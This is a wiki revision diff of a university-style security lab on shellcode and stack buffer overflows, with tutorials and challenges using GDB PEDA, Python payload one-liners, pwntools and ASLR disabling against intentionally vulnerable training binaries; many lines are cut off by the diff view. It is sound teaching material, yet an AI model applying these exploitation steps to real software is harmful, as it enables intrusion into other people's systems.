This shows you the differences between two versions of the page.
Both sides previous revision Previous revision Next revision | Previous revision | ||
session:08 [2018/07/03 16:18] Razvan Deaconescu |
session:08 [2020/07/19 12:49] (current) |
||
---|---|---|---|
Line 1: | Line 1: | ||
- | ====== | + | ====== |
===== Resources ===== | ===== Resources ===== | ||
- | [[http:// | + | /*[[http:// |
+ | |||
+ | [[https:// | ||
[[http:// | [[http:// | ||
- | |||
- | /* | ||
===== Reminder: Shellcode ===== | ===== Reminder: Shellcode ===== | ||
Line 19: | Line 19: | ||
- Inject the shellcode into the memory address space of the vulnerable process. This is fed through some form of input to the process (standard input, program arguments, sockets, I/O, environment variables etc.). | - Inject the shellcode into the memory address space of the vulnerable process. This is fed through some form of input to the process (standard input, program arguments, sockets, I/O, environment variables etc.). | ||
- Trigger the running of the shellcode by jumping to the shellcode address, usually done through a buffer overflow. | - Trigger the running of the shellcode by jumping to the shellcode address, usually done through a buffer overflow. | ||
+ | |||
+ | ===== 1. Tutorial: Shellcode Running ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | '' | ||
+ | < | ||
+ | $ make print | ||
+ | \xbb\x2a\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80 | ||
+ | </ | ||
+ | |||
+ | The shellcode is already part of '' | ||
+ | <code c> | ||
+ | void (*func_ptr)(void) = (void (*)(void)) shellcode; | ||
+ | func_ptr(); | ||
+ | </ | ||
+ | |||
+ | This is possible due to making the data section executable when linking the '' | ||
+ | |||
+ | You can check it works properly by running it and checking the return code: | ||
+ | < | ||
+ | $ ./vuln | ||
+ | Nice function at 0x8048510 | ||
+ | $ echo $? | ||
+ | 42 | ||
+ | </ | ||
+ | |||
+ | You can also check that by running the '' | ||
+ | < | ||
+ | $ strace ./vuln | ||
+ | execve(" | ||
+ | strace: [ Process PID=11063 runs in 32 bit mode. ] | ||
+ | [...] | ||
+ | write(1, "Nice function at 0x8048510\n", | ||
+ | ) = 27 | ||
+ | exit(42) | ||
+ | +++ exited with 42 +++ | ||
+ | </ | ||
+ | |||
+ | ===== 2. Challenge: exec Shellcode ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Find a proper shellcode in the [[http:// | ||
+ | |||
+ | ===== 3. Challenge: exec Shellcode (x86_64) ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Find a proper shellcode in the [[http:// | ||
+ | |||
+ | ===== 4. Challenge: Shellcode as Argument ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Feed the '' | ||
+ | |||
+ | ===== 5. Challenge: Shellcode at Standard Input ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Feed the '' | ||
+ | < | ||
+ | cat <(python -c 'print " | ||
+ | </ | ||
+ | |||
+ | ===== 6. Tutorial: Buffer Overflow ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | The '' | ||
+ | <code c> | ||
+ | char input[64]; | ||
+ | fgets(input, | ||
+ | </ | ||
+ | |||
+ | We want to call the function '' | ||
+ | - Find the address of the '' | ||
+ | - Determine the offset from the start of the buffer to the place storing the function return address. | ||
+ | - Create a payload that overwrites the return address with the address of the win function. | ||
+ | |||
+ | We find the address of the '' | ||
+ | < | ||
+ | $ nm vuln | grep win | ||
+ | 00000000004005b7 t win | ||
+ | </ | ||
+ | |||
+ | We determine the offset from the start of the buffer to the place storing the function return address by using GDB PEDA doing the following steps: | ||
+ | - Run the program under GDB with '' | ||
+ | - Create a cyclic pattern using '' | ||
+ | - Run the program using '' | ||
+ | - Feed the cyclic pattern to it (copy-paste). | ||
+ | - Extract the substring value from '' | ||
+ | - Get the offset from the start of the buffer to the saved RBP using '' | ||
+ | - Add 8 to the offset (the size of saved RBP) to determine the offset from the start of the buffer to the place storing the function return address. | ||
+ | |||
+ | We create the payload by using Python: | ||
+ | < | ||
+ | python -c 'print " | ||
+ | </ | ||
+ | where: | ||
+ | - '' | ||
+ | - '' | ||
+ | |||
+ | We exploit the program by feeding the input to the '' | ||
+ | < | ||
+ | python -c 'print " | ||
+ | </ | ||
+ | |||
+ | The exploit script is in '' | ||
+ | < | ||
+ | $ ./ | ||
+ | Have a number: 50 | ||
+ | Hello! Gimme input: Glad to meet you! | ||
+ | Congrats! | ||
+ | ./ | ||
+ | 11653 Segmentation fault | ../src/vuln | ||
+ | </ | ||
+ | The printing of the '' | ||
+ | |||
+ | ===== 7. Challenge: Buffer Overflow ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Similarly to the tutorial in '' | ||
+ | |||
+ | ===== 8. Challenge: Buffer Overflow ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Similarly to the tutorial in '' | ||
+ | |||
+ | ===== 9. Challenge: Buffer Overflow and Shellcode ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Exploit the buffer overflow in the '' | ||
+ | |||
+ | ===== 10. Tutorial: Buffer Overflow in pwntools ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | We use [[https:// | ||
+ | |||
+ | The '' | ||
+ | |||
+ | Check the [[http:// | ||
+ | |||
+ | ===== 11. Challenge: Buffer Overflow in pwntools ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | Create a '' | ||
+ | |||
+ | ===== 12. Challenge: Buffer Overflow and No Code in pwntools ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | Create a '' | ||
+ | |||
+ | ===== 13. Tutorial: Buffer Overflow and Shellcode in pwntools ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | This tutorial uses pwntools to craft a shellcode and then feed it to the program while also creating a buffer overflow payload. Go through it, see what it does. | ||
+ | |||
+ | Check the [[http:// | ||
+ | |||
+ | ===== 14. Challenge: Your Turn ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | Create a simple C program using a buffer overflow and able to store a shellcode into a global (data) variable. Compile it both for 32 and 64 bits. Then create exploits for them using '' | ||
+ | |||
+ | Create your simple C program in '' | ||
+ | |||
+ | The '' | ||
+ | |||
+ | ===== 15. Tutorial: Shellcode on Stack ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | We often use the stack to store the shellcode. That's what we use now. | ||
+ | |||
+ | For that to happen easily we need to disable ASLR using '' | ||
+ | < | ||
+ | $ setarch x86_64 -R /bin/bash | ||
+ | |||
+ | $ ldd vuln | ||
+ | linux-vdso.so.1 (0x00007ffff7ffb000) | ||
+ | libc.so.6 => / | ||
+ | / | ||
+ | $ ldd vuln | ||
+ | linux-vdso.so.1 (0x00007ffff7ffb000) | ||
+ | libc.so.6 => / | ||
+ | / | ||
+ | </ | ||
+ | |||
+ | Then we go into GDB and determine the offset and at the same time find the buffer address: | ||
+ | < | ||
+ | $ gdb ./vuln | ||
+ | </ | ||
+ | Use '' | ||
+ | |||
+ | In the '' | ||
+ | |||
+ | <note important> | ||
+ | To reenable ASLR, simply exit the shell you created using '' | ||
+ | </ | ||
+ | |||
+ | ===== 16. Challenge: io.netgarage.io level05 ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | It's a buffer overflow that may end up calling a shellcode placed on the stack buffer. | ||
+ | |||
+ | Create a '' | ||
+ | |||
+ | <note tip> | ||
+ | Use the '' | ||
+ | </ | ||
+ | |||
+ | <note important> | ||
+ | Disable ASLR using '' | ||
+ | </ | ||
+ | |||
+ | ===== 17. Challenge: Shellcode on Stack ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | Update the '' | ||
+ | |||
+ | ===== 18. Challenge: Shellcode on Stack (32 bit) ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | It's similar to the challenge above, except that it runs on 32 bits. Copy and update the '' | ||
+ | |||
+ | /* | ||
==== 10.b. Challenge: Buffer is too small: Use another buffer for storing the shellcode ==== | ==== 10.b. Challenge: Buffer is too small: Use another buffer for storing the shellcode ==== |